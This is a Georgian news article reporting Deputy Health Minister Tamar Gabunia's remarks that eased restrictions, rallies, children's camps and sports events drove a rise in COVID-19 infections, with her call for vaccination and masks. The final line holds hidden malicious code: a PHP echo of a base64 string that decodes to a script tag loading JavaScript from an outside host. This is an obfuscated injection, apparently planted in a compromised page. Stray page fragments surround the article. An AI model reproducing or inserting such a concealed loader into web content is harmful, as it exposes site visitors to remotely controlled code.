celsiusi
ავერსი შნაიდერი
ჯანდაცვის მინისტრის მოადგილის, თამარ გაბუნიას განცხადებით, ქვეყანაში კორონავირუსის ინფიცირებულთა ზრდა ბოლო პერიოდში შეზღუდვების შემსუბუქებამ გამოიწვია.
 
როგორც მან უწყებათაშორისი საკოორდინაციო საბჭოს სხდომის შემდეგ განაცხადა, მობილობას თავყრილობები, მათ შორის აქციები, მნიშვნელოვნად ზრდის.
 
„არ არის რთული გასაგები, რამ შეუწყო ხელი ინფიცირებულთა ზრდას. ბოლო პერიოდში, ჩვენ პრაქტიკულად დავრჩით ქმედითი შეზღუდვების გარეშე. მათ შორის, ღამით მოძრაობის შეზღუდვის გარეშე. ბოლო პერიოდში, მაღალი აქტივობაა თავყრილობებზე, მიტინგებზე, ორგანიზებული სახის კონფერენციებზე. ბავშვთა ბანაკებიც იყო აქტიური და შესაძლოა, ბავშვთა ბანაკებიც და სპორტული ღონისძიებებიც ინფექციის გავრცელების ხელშემწყობი იყო. დღეს ყველას გვესმის, რომ 1500-ზე მეტი შემთხვევა არის კრიტიკული ზღვარი იმისთვის, რომ სრულიად თავისუფალი რეჟიმით გავაგრძელოთ სოციალური აქტივობები. საკოორდინაციო საბჭო დაელოდება ეპიდვითარებას. დღეს არის მთავარი ვაქცინაციის სწრაფი ტემპი. ვაქცინა, ნიღაბი და სოციალური დისტანცირება რამდენადაც შესაძლებელია, არის მთავარი გამოსავალი. არასაჭირო ღონისძიებები, როგორიც არის სკოლების ბანაკი, მაქსიმალურად უნდა შევზღუდოთ და ვაკონტროლოთ დამსწრეთა რაოდენობა“, - განაცხადა თამარ გაბუნიამ.
 
რაც შეეხება აქციას, გაბუნიას თქმით, აქციისას განსაკუთრებით მაღალია არაბუნებრივი მობილობა.
 
„ამის გამოცდილება ნოემბერ-დეკემბრის პერიოდშიც გვქონდა. ეს ხელს უწყობს და რა თქმა უნდა, არ უშლის ინფექციის გავრცელებას. პირიქით, იქ პირბადე არავის გამოუყენებია და არც სოციალური დისტანციაა დაცული. მესმის, რომ საზოგადოებრივი აქტივობა აქციებისას მაღალია. ერთადერთი დაცვის საშუალება, რაც შეიძლება გამოვიყენოთ, ეს არის პირბადე“, - განაცხადა გაბუნიამ.
 
1196
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");